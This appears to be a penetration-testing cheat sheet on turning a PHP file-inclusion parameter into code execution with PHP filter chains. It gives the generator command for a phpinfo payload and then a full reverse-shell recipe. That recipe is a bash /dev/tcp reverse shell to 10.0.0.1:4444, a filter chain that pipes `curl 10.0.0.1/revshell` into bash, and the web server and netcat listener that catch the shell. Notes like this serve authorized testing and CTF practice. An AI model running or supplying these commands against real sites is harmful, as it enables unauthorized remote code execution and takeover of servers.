PHP Filters Chain

- [php-filters-chain](https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)

Exploitation

PHP Filter Chain Generator is available so we can use it.

python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'

We only have to do is paste the above generated payload to /?page=<genrated_chain>.

Reverse Shell

First create a shell script named "revshell" in local machine.

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

Then create a chain using a generator.
Replace the ip address with your own.

# `<?= ?>` is a shorthand for `<?php echo ~ ?>`
python3 php_filter_chain_generator.py --chain '<?= `curl -s -L 10.0.0.1/revshell|bash` ?>'

We need to start a web server that hosts the shell script, and also start a listener for receiving the reverse connection.

# terminal 1
sudo python3 -m http.server 80

# terminal 2
nc -lvnp 4444

Now access to /?page=<generated_chain>. We can get a shell.